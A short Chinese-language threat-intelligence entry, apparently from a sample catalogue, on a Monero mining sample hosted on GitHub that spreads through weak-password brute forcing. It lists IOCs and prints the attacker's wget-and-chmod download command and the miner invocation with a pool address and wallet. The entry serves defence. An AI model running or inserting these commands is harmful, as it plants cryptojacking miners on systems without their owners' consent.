简述

robertreynolds2是github上的一个挖矿样本.

样本类型

挖矿

elkeid 样本ID

elkeid_20220725_miner_2

捕获时间

  • 20220725

最近活跃时间

  • 20221118

已知入侵途径

  • 弱口令爆破

涉及样本

  • https://raw.githubusercontent.com/robertreynolds2/solo/main/solo

主要行为

  • 爆破后从git源拉取挖矿程序

wget https://raw.githubusercontent.com/robertreynolds2/solo/main/solo && chmod +x solo

  • 连接矿池进行挖矿

./solo -o gulf.moneroocean.stream:80 -u 49Wr4g6SVqiRabVyhk5zigZXR6bNXX8H5bhMUYiSTk1ijdhB2MBDQTedNuCj27NpFG53oWpaRq8hU1qHHHFevbCsQbCTXdN -p sshs -k -a rx/0 -t 16 -B

IOC

  • sha256

3928c5874249cc71b2d88e5c0c00989ac394238747bb7638897fc210531b4aab

  • 回连IP

  • URL

    • 挖矿程序: https://raw.githubusercontent.com/robertreynolds2/solo/main/solo
    • 矿池: gulf.moneroocean.stream

参考链接

  • solo样本情报 https://www.virustotal.com/gui/url/53529ffddf4a13edf3c04bfb42bcc61e73a7805c04068fc973f3bf484c64a44b/details

* 矿池情报 https://www.virustotal.com/gui/url/f79b7f06c6c3a5e4a66602f32b7e4519dc8df566f8bf85f469db5b5cf65d9c08